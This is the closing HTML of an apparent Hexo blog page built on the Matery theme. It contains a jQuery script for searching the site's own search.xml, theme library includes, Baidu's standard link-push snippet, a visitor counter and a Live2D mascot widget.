    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script><!-- hexo-inject:begin --><!-- hexo-inject:end -->
    

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/assets/hibiki.model.json"},"display":{"position":"left","width":200,"height":410},"mobile":{"show":false},"react":{"opacity":0.7}});</script></body>

</html>
<script type="text/javascript" src="/js/click_show_text.js"></script>